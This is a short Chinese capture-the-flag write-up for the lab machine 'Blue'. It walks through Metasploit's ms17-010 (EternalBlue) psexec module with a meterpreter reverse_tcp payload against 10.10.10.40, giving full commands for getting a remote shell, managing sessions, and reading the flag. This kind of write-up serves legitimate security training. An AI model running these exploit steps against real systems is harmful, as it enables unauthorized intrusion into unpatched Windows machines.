该文描述了一次针对靶机Blue的渗透测试过程,首先通过msf搜索并使用ms17-010漏洞(永恒之蓝),然后配置psexec模块,设定reverse_tcp回连方式。接着,对目标IP10.10.10.40进行攻击,成功后获得meterpreter会话,并进入目标机器的shell。在完成操作后,退出shell,挂起会话,并查看及重新进入会话。最终,目标是查找并获取flag。
本题非常简单,看靶机名称Blue大致就猜测是永恒之蓝漏洞,直接msf一把梭
# 打开msf 搜索相关 exp/poc
search ms17-010
# 使用 psexec 的
use 1
# 设置回连方式
set payload windows/x64/meterpreter/reverse_tcp
# 查看需要配置信息
show options
# 设置基本信息
set rhosts 10.10.10.40
set lhost 10.10.16.2
# 运行
run
此时获取了一个 meterpreter 会话,使用 shell命令进入目标机器 shell
# 退出目标机器shell
exit
# 挂起会话
background
# 查看后台有哪些会话
sessions -i
# 重新进入某个会话
sessions -i 1
直接查看 flag 即可
root flag
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
